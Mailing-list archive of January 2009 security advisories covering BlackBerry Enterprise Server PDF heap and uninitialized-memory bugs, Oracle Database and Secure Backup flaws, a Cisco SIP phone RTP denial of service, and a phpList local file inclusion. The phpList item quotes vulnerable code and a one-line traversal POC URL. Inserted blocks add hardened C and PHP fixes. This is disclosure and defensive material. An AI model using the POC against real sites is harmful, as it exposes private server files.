II. DESCRIPTION

Remote exploitation of a heap overflow vulnerability in Research In
Motion Ltd. (RIM)'s BlackBerry Enterprise Server could allow an
attacker to execute arbitrary code with the privileges of the affected
service, usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. During parsing, a dynamic array is filled up with pointers to
certain objects without properly checking to see whether the array is
large enough to hold all of the pointers. By inserting a large number
of pointers, it is possible to overflow the array, and corrupt object
pointers. This can lead to the EIP register being controlled, which
results in the execution of arbitrary code.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must e-mail an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

In Labs testing, it was possible to gain code execution, albeit
unreliably. It is likely that with additional heap sculpting reliable
code execution is possible.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server versions 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
      delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
      Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

From - Tue Jan 13 17:22:17 2009
Date: Tue, 13 Jan 2009 16:34:46 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: RIM BlackBerry Enterprise Server
 Attachment Service PDF Distiller Uninitialized Memory Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

The BlackBerry Enterprise Server is a suite of applications used to
connect enterprise email and messaging services to BlackBerry device
users. It consists of a variety of applications, one of which is the
Attachment Service. This application is used to convert email
attachments into a format that is easily rendered on BlackBerry
devices. When a user requests an attachment on their BlackBerry device,
the Attachment Service will obtain the attachment, parse and convert it,
and then send it to the user for viewing. The Attachment Service is
capable of converting a variety of different file formats, including
PDF files. This vulnerability affects the PDF filter/distiller. For
more information, see the vendor's site found at the following link.

http://na.blackberry.com/eng/services/server/

II. DESCRIPTION

Remote exploitation of an uninitialized memory vulnerability in Research
In Motion Ltd.'s BlackBerry Enterprise Server could allow an attacker to
execute arbitrary code with the privileges of the affected service,
which is usually SYSTEM.

The vulnerability occurs when parsing a data stream inside of a PDF
file. Due to a logic error, it is possible to allocate an array of
object pointers that is never initialized. This array is located on the
heap. When the object that contains this array is destroyed, each
pointer in the array is deleted. Since the memory is never properly
initialized, whatever content was previously there is used. It is
possible to control the chunk of memory that gets allocated for this
array, which can lead to attacker-controlled values being used as
object pointers. This results in the execution of arbitrary code when
these pointers are deleted.

III. ANALYSIS

Exploitation of this vulnerability results in the execution of arbitrary
code with the privileges of the Attachment Service, usually SYSTEM. In
order to exploit this vulnerability, an attacker must email an
enterprise BlackBerry user a malicious PDF file. Then, the user must
attempt to view the file on their device. It is important to note that
a user must request the attachment in order to trigger the parsing. It
is not possible to exploit this vulnerability in a completely automated
fashion without a user asking to view the file. However, after a user
has requested the attachment, no further interaction is necessary.

Labs testing has demonstrated that this vulnerability is highly
exploitable. It is possible to lay out the heap in such a way that a
previously allocated chunk of fully controllable memory is reused for
the uninitialized memory block. Code execution is then gained when this
memory is used as an array of object pointers.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in BlackBerry
Enterprise Server versions 4.1.5 and 4.1.6 (4.1 SP5, SP6). 4.1.6 is the
most current version, as of the publishing of this report. This
vulnerability was confirmed in BlackBerry Enterprise Server for
Microsoft Exchange, but is believed to affect the Lotus and Novell
versions as well. Previous versions may also be affected.

V. WORKAROUND

It is possible to disable the PDF Distiller, which will prevent the
conversion of PDF files by the Attachment Server. The following
workaround was suggested by RIM for a previous PDF Distiller
vulnerability, and has been verified to prevent the vulnerability
described in this report. This workaround can be accomplished as
follows:

To remove the PDF file extension from the list of supported file format
extensions, complete the following actions:

   1. From the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Format Extensions field, delete pdf: from the colon
      delimited list of extensions.
   4. Click Apply.
   5. Click OK.

After this, it is also necessary to completely disable the PDF distiller
from loading, which will prevent an attacker from renaming a PDF to some
other format extension. In order to do this, complete the following
steps:

   1. On the Windows Desktop, open the BlackBerry Server Configuration tool.
   2. Click the Attachment Server tab.
   3. In the Configuration Option drop-down list, select Attachment Server.
   4. In the Distiller Settings section, next to the distiller name
      Adobe PDF, clear the check box in the Enabled column.
   5. Click Apply.
   6. Click OK.
   7. On the Windows Desktop, in Administrative Tools, open Services.
   8. Right-click BlackBerry Attachment Service and click Stop.
   9. Right-click BlackBerry Attachment Service and click Start.
  10. Close Services.

In Microsoft Exchange and Novell GroupWise environments, complete the
following additional steps:

   1. On the Windows Desktop, in Administrative Tools, open Services.
   2. Right-click BlackBerry Dispatcher and click Stop.
   3. Right-click BlackBerry Dispatcher and click Start.
   4. Close Services.

In IBM Lotus Domino environments, complete the following additional
steps:

   1. Open the IBM Lotus Domino Administrator.
   2. Click the Server tab.
   3. Click the Status tab.
   4. Click Server Console.
   5. In the Domino Command field, type tell BES quit and press ENTER.
   6. In the Domino Command field, type load BES and press ENTER.
   7. Close the IBM Lotus Domino Administrator.

VI. VENDOR RESPONSE

Research In Motion (RIM) has released a patch which addresses this
issue. For more information, consult their advisories at the following
URLs:

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17118

http://www.blackberry.com/btsc/search.do?cmd=displayKC&docType=kc&externalId=KB17119

VII. CVE INFORMATION

A Mitre Corp. Common Vulnerabilities and Exposures (CVE) number has not
been assigned yet.

VIII. DISCLOSURE TIMELINE

12/17/2008  Initial Vendor Notification
12/17/2008  Initial Vendor Reply
12/17/2008  PoC Code Provided To Vendor
12/17/2008  Request Additional Information
01/06/2009  Additional Vendor Feedback
01/12/2009  Coordinated Public Disclosure

IX. CREDIT

This vulnerability was discovered by Sean Larsson, iDefense Labs.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
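
Added example, not part of either iDefense advisory and not RIM code: the two
bug classes described in the BlackBerry PDF distiller advisories above (a heap
array of object pointers filled without a capacity check, and a pointer array
whose slots are never initialized before the destructor frees each one), shown
in hardened C. The obj and ptrvec types, the PTRVEC_MAX limit and all function
names are hypothetical.

```c
#include <stdio.h>
#include <stdlib.h>

/* Hypothetical stand-in for a parsed PDF object (not a RIM structure). */
typedef struct obj { int id; } obj;

/* Heap array of object pointers filled while a stream is parsed. */
typedef struct ptrvec {
    obj  **items;
    size_t len;   /* slots filled by the parser */
    size_t cap;   /* slots allocated */
} ptrvec;

/* Assumed policy limit on objects per stream. */
#define PTRVEC_MAX 4096u

/* Set slots [from, to) to NULL so none holds stale heap contents. */
static void null_fill(obj **p, size_t from, size_t to)
{
    for (size_t i = from; i < to; i++)
        p[i] = NULL;
}

/* Allocate cap slots. Omitting null_fill() is the uninitialized-memory bug:
 * the destructor would free whatever the allocator left in the slots. */
int ptrvec_init(ptrvec *v, size_t cap)
{
    *v = (ptrvec){ NULL, 0, 0 };
    if (cap > PTRVEC_MAX)
        return -1;
    if (cap == 0)
        return 0;
    v->items = malloc(cap * sizeof *v->items); /* cap is bounded: no wrap */
    if (v->items == NULL)
        return -1;
    null_fill(v->items, 0, cap);
    v->cap = cap;
    return 0;
}

/* Append one pointer. The overflow bug is the bare store at the end of this
 * function with no comparison of len against cap before it. */
int ptrvec_push(ptrvec *v, obj *o)
{
    if (v->len == v->cap) {
        size_t ncap = v->cap ? v->cap * 2 : 8;
        if (ncap > PTRVEC_MAX)
            ncap = PTRVEC_MAX;
        if (ncap <= v->cap)
            return -1;              /* at the limit: refuse, never write */
        obj **grown = realloc(v->items, ncap * sizeof *grown);
        if (grown == NULL)
            return -1;              /* old array is still valid */
        null_fill(grown, v->cap, ncap);
        v->items = grown;
        v->cap = ncap;
    }
    v->items[v->len++] = o;
    return 0;
}

/* Free every slot, filled or not, as the destructor in the advisory does.
 * That is safe only because unfilled slots are guaranteed to be NULL. */
size_t ptrvec_destroy(ptrvec *v)
{
    size_t freed = 0;
    for (size_t i = 0; i < v->cap; i++) {
        freed += (v->items[i] != NULL);
        free(v->items[i]);          /* free(NULL) is a no-op */
    }
    free(v->items);
    *v = (ptrvec){ NULL, 0, 0 };
    return freed;
}

/* Constructed input: a stream that declares `declared` objects but carries
 * `actual`. Returns the objects freed, or -1 if the stream is rejected. */
long parse_stream_demo(size_t declared, size_t actual)
{
    ptrvec v;
    if (ptrvec_init(&v, declared) != 0)
        return -1;
    for (size_t i = 0; i < actual; i++) {
        obj *o = malloc(sizeof *o);
        if (o == NULL || ptrvec_push(&v, o) != 0) {
            free(o);
            ptrvec_destroy(&v);
            return -1;
        }
    }
    return (long)ptrvec_destroy(&v);
}

int main(void)
{
    printf("%ld %ld %ld\n", parse_stream_demo(16, 3),
           parse_stream_demo(2, 100), parse_stream_demo(0, 5000));
    return 0;
}
```

The first call leaves 13 slots unfilled and still destroys cleanly; the third
is rejected once the stream exceeds the assumed limit.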

From - Wed Jan 14 11:42:18 2009
Date: Tue, 13 Jan 2009 17:36:18 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Database 10g R2 Summary
 Advisor Arbitrary File Rewrite Vulnerability

iDefense Security Advisory 01.12.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 12, 2009

I. BACKGROUND

Oracle Database Server is a family of database products that range from
personal databases to enterprise solutions. Further information is
available at the following URL:

http://www.oracle.com/database/index.html

II. DESCRIPTION

Local exploitation of an arbitrary file rewrite vulnerability in Oracle
Corp.'s Oracle Database 10g Release 2 database product allows attackers
to gain elevated privileges.

The vulnerability exists in a function that allows a user with an
authenticated session to create any file or rewrite any files to which
the database account has access.

III. ANALYSIS

Successful exploitation allows the attacker to gain database account
privilege. On Linux and Unix systems the database account is usually
'oracle' while on Windows systems it is the 'SYSTEM' account. To
exploit this vulnerability, the attacker must create a session and
execute the privileged procedure.

IV. DETECTION

iDefense has confirmed the existence of this vulnerability in Oracle
Database 10g Release 2 version 10.2.0.3.0 on 32-bit Linux platform and
Windows platform. Previous versions may also be affected. Oracle
Database 11g Release 1 version 11.1.0.6.0 is not affected by this
vulnerability.

V. WORKAROUND

iDefense is currently unaware of any workaround for this issue.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-3997 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/24/2008  - Initial Vendor Notification
03/25/2008  - Initial Vendor Response
11/24/2008  - Status update from Vendor
01/12/2009  - Coordinated Public Disclosure

IX. CREDIT

This vulnerability was reported to iDefense by Code Audit Labs
(http://vulnhunt.com).

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.

From - Wed Jan 14 11:52:18 2009
Date: Wed, 14 Jan 2009 13:29:32 +0100
From: Laurent Butti <laurent.butti@orange-ftgroup.com>
To: bugtraq@securityfocus.com
Subject: Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Title:
------
* Cisco Unified IP Phone 7960G and 7940G (SIP) RTP Header Vulnerability

Summary:
--------
* The Cisco Unified IP Phone 7960G and 7940G (SIP) do not correctly
parse some malformed RTP headers leading to a deterministic denial of
service

Assigned CVE:
-------------
* CVE-2008-4444

Details:
--------
* SIP protocol is used to set up calls between phones. Once the call is
established, the media content is carried by the RTP protocol. A remote
attacker could send a specially crafted RTP packet against a Cisco SIP
phone in such a way as to cause the phone to reboot.

Attack Impact:
--------------
* Denial-of-service (reboot or hang-up) and possibly remote arbitrary
code execution

Attack Vector:
--------------
* Have the possibility to set up a call to the targeted phone and carry
RTP frame to the vulnerable device
* Have access to the VoIP network while a call is established and inject
RTP frames

Timeline:
---------
* 2008-06-13 - Vulnerability reported to Cisco
* 2008-06-16 - Full details sent to Cisco
* 2008-10-21 - Cisco released a patched firmware
* 2009-01-14 - Release of this security advisory

Affected Products:
------------------
* Cisco Unified IP Phone 7960G and 7940G (SIP) with P0S3-08-9-00
firmware. Cisco released a patched firmware on October 21, 2008 which is
described in the bug identifier CSCsu22285 (Cisco Unified IP Phone 7960G
and 7940G (SIP) Release Notes for Firmware Release 8.10).

Credits:
--------
* This vulnerability was discovered by Gabriel Campana and Laurent Butti
from France Telecom / Orange

From - Wed Jan 14 12:02:17 2009
Date: Tue, 13 Jan 2009 18:05:39 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Corp.'s Secure Backup is tape backup management software. For
more information, please visit the following website:
http://www.oracle.com/technology/products/secure-backup/index.html

II. DESCRIPTION

Remote exploitation of two command injection vulnerabilities in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

In both cases, the vulnerabilities exist in PHP scripts that
authenticate a user attempting to use the service.

The first vulnerability is in "php/login.php". By making a login request
with a specially crafted cookie value, an attacker can execute arbitrary
code on the server.

The second vulnerability is in "php/common.php". This function is called
from the "login.php" page. A variable is used to specify a command to be
run. An attacker can supply any shell command for this variable and it
will be executed in the context of the web server process.

III. ANALYSIS

Exploitation allows an attacker to execute arbitrary shell commands in
the context of the web server process. Under Windows, the
Administration Server runs as SYSTEM, so the injected command will be
executed as SYSTEM. Under Linux it runs as an unprivileged user. No
authentication is required to exploit this vulnerability.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.2.0.2 for Linux, and Secure
Backup version 10.2.0.2 for Windows have been confirmed vulnerable.
Other versions and other platforms may also be affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-4006 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

07/18/2008  Initial Vendor Notification
07/30/2008  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbR5Dbjs6HoxIfBkRAiqHAKDxgxrDdjVEkqbYmee6NGCIeoKOLACgtl24
BAfUScwWY6Jz5DBquOL3cbE=MpPP
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:12:18 2009
Date: Wed, 14 Jan 2009 12:20:17 +0330
From: admin@bugreport.ir
To: bugtraq@securityfocus.com
Subject: phpList <= 2.10.8 Local File inclusion

########################## www.BugReport.ir #########################
#
#      AmnPardaz Security Research Team
#
# Title: phpList Local File inclusion
# Vendor: http://www.phplist.com
# Bug: Local File Inclusion
# Vulnerable Version: 2.10.8 (prior versions also may be affected)
# Exploitation: Remote with browser
# Fix: N/A
# Original Advisory: http://www.bugreport.ir/index_60.htm
###################################################################


####################
- Description:
####################

Quote From vendor:"phplist is an open-source newsletter manager.  
phplist is free to download, install and use, and is easy to integrate  
with any website.
phplist is downloaded more than 10 000 times per month and is listed  
in the top open source projects for vitality score on Freshmeat.
phplist is sponsored by tincan."


####################
- Vulnerability:
####################

+--> Local File Inclusion

Because of the vulnerability in "admin/index.php", when
"register_globals" is disabled (default PHP configuration) it is
possible for remote attackers to include arbitrary files from local
resources before performing authentication.

Code Snippet:
/lists/admin.php #line:10-18

if (!ini_get("register_globals") || ini_get("register_globals") == "off") {
   # fix register globals, for now, should be phased out gradually
   # sure, this gets around the entire reason that register globals
   # should be off, but going through three years of code takes a long time....

   foreach ($_REQUEST as $key => $val) {
     $$key = $val;
   }
}

/lists/admin.php #line:41-56

if (isset($_SERVER["ConfigFile"]) && is_file($_SERVER["ConfigFile"])) {
   print '<!-- using '.$_SERVER["ConfigFile"].'-->'."\n";
   include $_SERVER["ConfigFile"];
} elseif (isset($cline["c"]) && is_file($cline["c"])) {
   print '<!-- using '.$cline["c"].' -->'."\n";
   include $cline["c"];
} elseif (isset($_ENV["CONFIG"]) && is_file($_ENV["CONFIG"])) {
#  print '<!-- using '.$_ENV["CONFIG"].'-->'."\n";
   include $_ENV["CONFIG"];
} elseif (is_file("../config/config.php")) {
   print '<!-- using ../config/config.php -->'."\n";
   include "../config/config.php";
} else {
   print "Error, cannot find config file\n";
   exit;
}

####################
- POC:
####################

http://www.example.com/lists/admin/index.php?_SERVER[ConfigFile]=../.htaccess

####################
- Credit:
####################
AmnPardaz Security Research Team
Contact: admin[4t}bugreport{d0t]ir
www.BugReport.ir
www.AmnPardaz.com
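
Added example, not part of the original advisory and not phpList's own code: a hardened form of the two snippets quoted above. The function names `import_request_vars` and `resolve_config_file`, the allowlisted variable `page`, and the temporary directory layout are assumptions made for illustration; the sample request is constructed and mirrors the shape of the advisory's POC.

```php
<?php
declare(strict_types=1);

// Replacement for the "foreach ($_REQUEST ...) $$key = $val" loop.
// Only names on an explicit allowlist are imported, and they are returned
// in an array instead of being written into the global symbol table, so a
// request key such as "_SERVER" can never shadow server-side state.
function import_request_vars(array $request, array $allowed): array
{
    $imported = [];
    foreach ($allowed as $name) {
        if (array_key_exists($name, $request) && is_string($request[$name])) {
            $imported[$name] = $request[$name];
        }
    }
    return $imported;
}

// Replacement for the "include $_SERVER['ConfigFile']" chain.
// A candidate path is accepted only if, after resolving symlinks and "..",
// it is a .php file located inside $configDir; anything else falls back to
// the default config.php or fails closed.
function resolve_config_file(?string $candidate, string $configDir): string
{
    $base = realpath($configDir);
    if ($base === false) {
        throw new RuntimeException('config directory missing');
    }
    if ($candidate !== null) {
        $real = realpath($candidate);
        $inside = $real !== false
            && strncmp($real, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) === 0;
        if ($inside && is_file($real) && substr($real, -4) === '.php') {
            return $real;
        }
    }
    $default = $base . DIRECTORY_SEPARATOR . 'config.php';
    if (is_file($default)) {
        return $default;
    }
    throw new RuntimeException('cannot find config file');
}

// --- Demonstration on a constructed directory tree and request ---
$root = sys_get_temp_dir() . DIRECTORY_SEPARATOR . 'lfi_demo_' . bin2hex(random_bytes(4));
mkdir($root . DIRECTORY_SEPARATOR . 'config', 0700, true);
file_put_contents($root . '/config/config.php', "<?php \$demo_config_loaded = true;\n");
file_put_contents($root . '/.htaccess', "deny from all\n");

// Constructed request: one legitimate parameter plus a key that tries to
// replace $_SERVER['ConfigFile'], as in the advisory's POC.
$request = [
    'page'    => 'home',
    '_SERVER' => ['ConfigFile' => $root . '/.htaccess'],
];

$vars = import_request_vars($request, ['page']);
echo 'imported keys: ' . implode(',', array_keys($vars)) . "\n";

// Even if the hostile path reached the resolver, it is outside the config
// directory and is not a .php file, so the default config is selected.
$hostile = $request['_SERVER']['ConfigFile'];
$chosen  = resolve_config_file($hostile, $root . '/config');
echo 'config selected: ' . basename($chosen) . "\n";

// A legitimate override inside the config directory is still honoured.
file_put_contents($root . '/config/staging.php', "<?php\n");
$chosen = resolve_config_file($root . '/config/staging.php', $root . '/config');
echo 'override selected: ' . basename($chosen) . "\n";

// Clean up the constructed files.
foreach (['/config/staging.php', '/config/config.php', '/.htaccess'] as $f) {
    unlink($root . $f);
}
rmdir($root . '/config');
rmdir($root);
```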

From - Wed Jan 14 12:12:18 2009
Date: Tue, 13 Jan 2009 18:36:10 -0500
From: iDefense Labs <labs-no-reply@idefense.com>
To: bugtraq@securityfocus.com, vulnwatch@vulnwatch.org,
full-disclosure@lists.grok.org.uk
Subject: iDefense Security Advisory 01.13.09: Oracle Secure Backup Administration
 Server login.php Command Injection Vulnerability

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

iDefense Security Advisory 01.13.09
http://labs.idefense.com/intelligence/vulnerabilities/
Jan 13, 2009

I. BACKGROUND

Oracle Secure Backup is a network backup system for Oracle Databases.
For more information, see:

http://www.oracle.com/database/secure-backup.html

II. DESCRIPTION

Remote exploitation of an input validation vulnerability in the
authentication component of Oracle Corp.'s Secure Backup Administration
Server could allow an unauthenticated attacker to execute arbitrary
commands in the context of the running server.

The vulnerability is in a function of common.php which is called from
the login.php page. The script fails to sanitize the input when
verifying the user has permission to use the service.

III. ANALYSIS

Successful exploitation allows an attacker to gain complete control over
an affected system. Because the Administration Server runs as an
unprivileged user, commands will be executed as that user. Under the
Linux (and possibly other) installations many files are installed world
writable. These include the configuration file for the Apache web-server
that the Administration Server is built on. This server starts as the
root user and changes to a user specified by the configuration files.
Since these files are writable by the user it may be possible for them
to gain access to the root user account. Other configuration and
executable files are also able to be changed.

IV. DETECTION

Oracle Corp.'s Secure Backup version 10.1.0.3 for Linux has been
confirmed vulnerable. Other versions and other platforms may also be
affected.

V. WORKAROUND

Block access to the httpd interface of vulnerable servers. Remove write
access for 'other' users to all files. The following command will
recursively change the permissions to remove write permission to
'other'.

chmod -R o-w directory/

This may prevent some aspects of the system from functioning correctly.

VI. VENDOR RESPONSE

Oracle has released a patch which addresses this issue. For more
information, consult their advisory at the following URL.

http://www.oracle.com/technology/deploy/security/critical-patch-updates/cpujan2009.html

VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned the
name CVE-2008-5449 to this issue. This is a candidate for inclusion in
the CVE list (http://cve.mitre.org/), which standardizes names for
security problems.

VIII. DISCLOSURE TIMELINE

03/08/2007  Initial Vendor Notification
03/08/2007  Initial Vendor Reply
11/24/2008  Additional Vendor Feedback
01/13/2009  Coordinated Public Disclosure

IX. CREDIT

The discoverer of this vulnerability wishes to remain anonymous.

Get paid for vulnerability research
http://labs.idefense.com/methodology/vulnerability/vcp.php

Free tools, research and upcoming events
http://labs.idefense.com/

X. LEGAL NOTICES

Copyright © 2009 iDefense, Inc.

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without the express
written consent of iDefense. If you wish to reprint the whole or any
part of this alert in any other medium other than electronically,
please e-mail customerservice@idefense.com for permission.

Disclaimer: The information in the advisory is believed to be accurate
at the time of publishing based on currently available information. Use
of the information constitutes acceptance for use in an AS IS condition.
 There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct,
indirect, or consequential loss or damage arising from use of, or
reliance on, this information.
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.7 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFJbSVqbjs6HoxIfBkRArHaAJsFJIEtFoycfmcGAbikDpSDFvBrWwCfbLR0
qVu5Ie2NSW2bRoITpl4Jix4=VahW
-----END PGP SIGNATURE-----

From - Wed Jan 14 12:32:17 2009
From: "David Litchfield" <davidl@ngssoftware.com>
To: <full-disclosure@lists.grok.org.uk>, <bugtraq@securityfocus.com>
Subject: Trigger Abuse of MDSYS.SDO_TOPO_DROP_FTBL in Oracle 10g R1 and R2
Date: Tue, 13 Jan 2009 23:52:02 -0000


NGSSoftware Insight Security Research Advisory

Name: Trigger abuse of MDSYS.SDO_TOPO_DROP_FTBL
Systems Affected: Oracle 10g R1 and R2 (10.1.0.5 and 10.2.0.2)
Severity: High
Vendor URL: http://www.oracle.com/
Author: David Litchfield [ davidl@ngssoftware.com ]
Reported: 23rd July 2008
Date of Public Advisory: 13th January 2009
Advisory number: #NISR13012009
CVE: CVE-2008-3979

Overview
********
Oracle has just released a fix for a flaw that, when exploited, allows a low 
privileged authenticated database user to gain MDSYS privileges. This can be 
abused by an attacker to perform actions as the MDSYS user.

Details
*******
MDSYS.SDO_TOPO_DROP_FTBL is one of the triggers that forms part of the 
Oracle Spatial Application. It is vulnerable to SQL injection. When a user 
drops a table the trigger fires. The name of the table is embedded in a 
dynamic SQL query which is then executed by the trigger. Note that the 
Oracle advisory states that the attacker requires the DROP TABLE and CREATE 
PROCEDURE privileges. This is not the case and only CREATE SESSION 
privileges are required.

Fix Information
***************
Oracle was alerted to this flaw on the 23rd July 2008. A patch has now been 
made available:

